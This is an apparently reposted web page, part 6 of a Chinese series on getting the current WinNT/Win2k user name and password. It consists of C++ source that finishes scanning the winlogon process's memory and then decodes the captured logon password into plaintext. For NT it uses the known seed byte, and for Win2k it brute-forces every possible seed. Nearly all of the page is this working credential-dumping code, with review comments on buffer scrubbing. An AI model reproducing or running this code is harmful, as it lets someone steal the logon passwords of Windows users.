获取WinNT/Win2k当前用户名和密码(6)
2008-02-23 05:38:12来源:互联网 阅读 ()
dwIncrement = siSystemInfo.dwPageSize;
// Move to next memory block.
i = dwIncrement;
}
CloseHandle(hWinLogonHandle);
return (FALSE);
}
//---------------------------------------------------------------------------
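// Decodes the captured logon password with the known seed byte and hands the
// domain, user name and password back through the three out-parameters.
//
// Reads file-level state that is set outside this block: pvPwd (the encoded
// password), dwPwdLen (its length, used here as a count of wchar_t),
// dwHashByte (the decode seed), wszUserDomain / wszUserName, and the
// pfnRtlRunDecodeUnicodeString function pointer.
//
// The out-parameters are left untouched when the length does not fit a
// UNICODE_STRING or the working buffer cannot be allocated.
//
// NOTE(review): the String copies returned to the caller hold the plaintext
// password; this function can only scrub its own working buffer.
void ReturnWinNTPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
    // UNICODE_STRING stores 16-bit byte counts. Reject any length whose byte
    // size (plus terminator) would not fit, so the allocation size and the
    // copy size below can never disagree through truncation.
    const DWORD cchMax = (0xFFFF / sizeof(wchar_t)) - 1;
    if (dwPwdLen > cchMax)
        return;

    const DWORD cbPwd = dwPwdLen * sizeof(wchar_t);
    const DWORD cbAlloc = cbPwd + sizeof(wchar_t);   // room for the terminating NUL

    UNICODE_STRING usEncodedString;
    usEncodedString.Length = (USHORT)cbPwd;
    usEncodedString.MaximumLength = (USHORT)cbAlloc;
    usEncodedString.Buffer = (PWSTR)HeapAlloc(GetProcessHeap(),
        HEAP_ZERO_MEMORY, cbAlloc);
    if (usEncodedString.Buffer == NULL)
        return;                                      // allocation failed, nothing to decode

    CopyMemory(usEncodedString.Buffer, pvPwd, cbPwd);

    // Finally - decode the password.
    // Note that only one call is required since the hash-byte
    // was part of the originally encoded string.
    pfnRtlRunDecodeUnicodeString((BYTE)dwHashByte, &usEncodedString);

    strCurrDomain = String(wszUserDomain);
    strCurrUser = String(wszUserName);
    strCurrPwd = AnsiString(usEncodedString.Buffer);

    // Scrub the decoded plaintext before the block goes back to the heap;
    // the volatile pointer keeps the stores from being optimised away.
    volatile BYTE *pbScrub = (volatile BYTE *)usEncodedString.Buffer;
    for (DWORD n = 0; n < cbAlloc; n++)
        pbScrub[n] = 0;

    HeapFree(GetProcessHeap(), 0, usEncodedString.Buffer);
}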
//---------------------------------------------------------------------------
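// Tries every possible seed byte against the captured logon password and
// hands back the domain, user name and the candidate that decodes to
// printable ASCII.
//
// Reads file-level state that is set outside this block: pvPwd (the encoded
// password), dwPwdLen (its length, used here as a count of wchar_t),
// wszUserDomain / wszUserName, and the pfnRtlRunDecodeUnicodeString function
// pointer.
//
// The out-parameters are left untouched when the length does not fit a
// UNICODE_STRING, the working buffer cannot be allocated, or no seed yields
// a printable result. The result is a guess: any seed whose output is
// printable ASCII is accepted, and a later match overwrites an earlier one.
//
// NOTE(review): the String copies returned to the caller hold the plaintext
// password; this function can only scrub its own working buffer.
void ReturnWin2kPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
    // UNICODE_STRING stores 16-bit byte counts. Reject any length whose byte
    // size (plus terminator) would not fit, so the allocation size and the
    // copy size below can never disagree through truncation.
    const DWORD cchMax = (0xFFFF / sizeof(wchar_t)) - 1;
    if (dwPwdLen > cchMax)
        return;

    const DWORD cbPwd = dwPwdLen * sizeof(wchar_t);
    const DWORD cbAlloc = cbPwd + sizeof(wchar_t);   // room for the terminating NUL

    UNICODE_STRING usEncodedString;
    usEncodedString.Length = (USHORT)cbPwd;
    usEncodedString.MaximumLength = (USHORT)cbAlloc;
    usEncodedString.Buffer = (PWSTR)HeapAlloc(GetProcessHeap(),
        HEAP_ZERO_MEMORY, cbAlloc);
    if (usEncodedString.Buffer == NULL)
        return;                                      // allocation failed, nothing to decode

    // This is a brute force technique since the hash-byte
    // is not stored as part of the encoded string.
    for (DWORD i = 0; i <= 0xff; i++)
    {
        // Decoding happens in place, so restore the encoded bytes each round.
        CopyMemory(usEncodedString.Buffer, pvPwd, cbPwd);
        pfnRtlRunDecodeUnicodeString((BYTE)i, &usEncodedString);

        // Check for a viewable password: every character must have a zero
        // high byte and a low byte in the printable ASCII range 0x20..0x7e.
        // Indexing the byte pointer avoids casting the pointer to DWORD,
        // which would truncate it on a 64-bit build.
        const BYTE *pbTemp = (const BYTE *)usEncodedString.Buffer;
        BOOL bViewable = TRUE;
        for (DWORD j = 0; (j < dwPwdLen) && bViewable; j++, pbTemp += sizeof(wchar_t))
        {
            if (pbTemp[1] != 0 || pbTemp[0] < 0x20 || pbTemp[0] > 0x7e)
                bViewable = FALSE;
        }

        if (bViewable)
        {
            strCurrDomain = String(wszUserDomain);
            strCurrUser = String(wszUserName);
            strCurrPwd = String(usEncodedString.Buffer);
        }
    }

    // Scrub the last decoded candidate before the block goes back to the
    // heap; the volatile pointer keeps the stores from being optimised away.
    volatile BYTE *pbScrub = (volatile BYTE *)usEncodedString.Buffer;
    for (DWORD n = 0; n < cbAlloc; n++)
        pbScrub[n] = 0;

    HeapFree(GetProcessHeap(), 0, usEncodedString.Buffer);
}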
//---------------------------------------------------------------------------
